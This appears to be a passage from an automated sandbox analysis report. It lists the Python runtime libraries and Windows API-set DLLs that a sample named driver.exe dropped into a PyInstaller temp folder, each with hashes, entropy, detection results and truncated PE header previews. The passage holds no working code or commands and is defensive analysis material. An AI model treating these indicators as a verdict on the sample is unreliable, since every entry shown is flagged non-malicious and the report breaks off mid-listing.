Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..\|^..}M..\|_..}M..\|T..}M..\|Q..}..\|^..}\..}...}...\|U..}..\|]..}..\|]..}.>}]..}..\|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61432
Entropy (8bit):	7.832464272741381
Encrypted:	false
SSDEEP:	1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
MD5:	F018B2C125AA1ECC120F80180402B90B
SHA1:	CF2078A591F0F45418BAB7391C6D05275690C401
SHA-256:	67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
SHA-512:	C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70512
Entropy (8bit):	7.839717554547019
Encrypted:	false
SSDEEP:	1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
MD5:	309B1A7156EBD03474B44F11BA363E89
SHA1:	8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
SHA-256:	67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
SHA-512:	E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22112
Entropy (8bit):	4.744270711412692
Encrypted:	false
SSDEEP:	192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
MD5:	E8B9D74BFD1F6D1CC1D99B24F44DA796
SHA1:	A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
SHA-256:	B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
SHA-512:	B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.602255667966723
Encrypted:	false
SSDEEP:	192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
MD5:	CFE0C1DFDE224EA5FED9BD5FF778A6E0
SHA1:	5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
SHA-256:	0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
SHA-512:	B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.606873381830854
Encrypted:	false
SSDEEP:	192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
MD5:	33BBECE432F8DA57F17BF2E396EBAA58
SHA1:	890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
SHA-256:	7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
SHA-512:	619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.65169290018864
Encrypted:	false
SSDEEP:	192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
MD5:	EB0978A9213E7F6FDD63B2967F02D999
SHA1:	9833F4134F7AC4766991C918AECE900ACFBF969F
SHA-256:	AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
SHA-512:	6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	4.866487428274293
Encrypted:	false
SSDEEP:	192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
MD5:	EFAD0EE0136532E8E8402770A64C71F9
SHA1:	CDA3774FE9781400792D8605869F4E6B08153E55
SHA-256:	3D2C55902385381869DB850B526261DDEB4628B83E690A32B67D2E0936B2C6ED
SHA-512:	69D25EDF0F4C8AC5D77CB5815DFB53EAC7F403DC8D11BFE336A545C19A19FFDE1031FA59019507D119E4570DA0D79B95351EAC697F46024B4E558A0FF6349852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......z.....`A........................................p................@...............@..h&..............p............................................................................rdata..\|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.619913450163593
Encrypted:	false
SSDEEP:	192:iDGaWqhWhWJWadJCsVWQ4mWd9afKUSIX01k9z3AEXzAU9:i6aWqhWACs92IR9z5EU9
MD5:	1C58526D681EFE507DEB8F1935C75487
SHA1:	0E6D328FAF3563F2AAE029BC5F2272FB7A742672
SHA-256:	EF13DCE8F71173315DFC64AB839B033AB19A968EE15230E9D4D2C9D558EFEEE2
SHA-512:	8EDB9A0022F417648E2ECE9E22C96E2727976332025C3E7D8F15BCF6D7D97E680D1BF008EB28E2E0BD57787DCBB71D38B2DEB995B8EDC35FA6852AB1D593F3D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@......;.....`A........................................p...L............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18696
Entropy (8bit):	7.054510010549814
Encrypted:	false
SSDEEP:	384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
MD5:	BFFFA7117FD9B1622C66D949BAC3F1D7
SHA1:	402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
SHA-256:	1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
SHA-512:	B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.625331165566263
Encrypted:	false
SSDEEP:	192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
MD5:	E89CDCD4D95CDA04E4ABBA8193A5B492
SHA1:	5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
SHA-256:	1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
SHA-512:	55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.737397647066978
Encrypted:	false
SSDEEP:	192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
MD5:	ACCC640D1B06FB8552FE02F823126FF5
SHA1:	82CCC763D62660BFA8B8A09E566120D469F6AB67
SHA-256:	332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
SHA-512:	6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..\|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.6569647133331316
Encrypted:	false
SSDEEP:	192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
MD5:	C6024CC04201312F7688A021D25B056D
SHA1:	48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
SHA-256:	8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
SHA-512:	D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.882042129450427
Encrypted:	false
SSDEEP:	192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
MD5:	1F2A00E72BC8FA2BD887BDB651ED6DE5
SHA1:	04D92E41CE002251CC09C297CF2B38C4263709EA
SHA-256:	9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
SHA-512:	8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.355894399765837
Encrypted:	false
SSDEEP:	384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
MD5:	724223109E49CB01D61D63A8BE926B8F
SHA1:	072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
SHA-256:	4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
SHA-512:	19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.771309314175772
Encrypted:	false
SSDEEP:	192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
MD5:	3C38AAC78B7CE7F94F4916372800E242
SHA1:	C793186BCF8FDB55A1B74568102B4E073F6971D6
SHA-256:	3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
SHA-512:	C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.7115212149950185
Encrypted:	false
SSDEEP:	192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
MD5:	321A3CA50E80795018D55A19BF799197
SHA1:	DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
SHA-256:	5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
SHA-512:	3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.893761152454321
Encrypted:	false
SSDEEP:	192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
MD5:	0462E22F779295446CD0B63E61142CA5
SHA1:	616A325CD5B0971821571B880907CE1B181126AE
SHA-256:	0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
SHA-512:	07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	5.231196901820079
Encrypted:	false
SSDEEP:	192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
MD5:	C3632083B312C184CBDD96551FED5519
SHA1:	A93E8E0AF42A144009727D2DECB337F963A9312E
SHA-256:	BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
SHA-512:	8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.799245167892134
Encrypted:	false
SSDEEP:	192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
MD5:	517EB9E2CB671AE49F99173D7F7CE43F
SHA1:	4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
SHA-256:	57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
SHA-512:	492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.587063911311469
Encrypted:	false
SSDEEP:	192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
MD5:	F3FF2D544F5CD9E66BFB8D170B661673
SHA1:	9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
SHA-256:	E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
SHA-512:	184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.754374422741657
Encrypted:	false
SSDEEP:	192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
MD5:	A0C2DBE0F5E18D1ADD0D1BA22580893B
SHA1:	29624DF37151905467A223486500ED75617A1DFD
SHA-256:	3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
SHA-512:	3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.664553499673792
Encrypted:	false
SSDEEP:	192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
MD5:	2666581584BA60D48716420A6080ABDA
SHA1:	C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
SHA-256:	27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
SHA-512:	BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dll

Download File

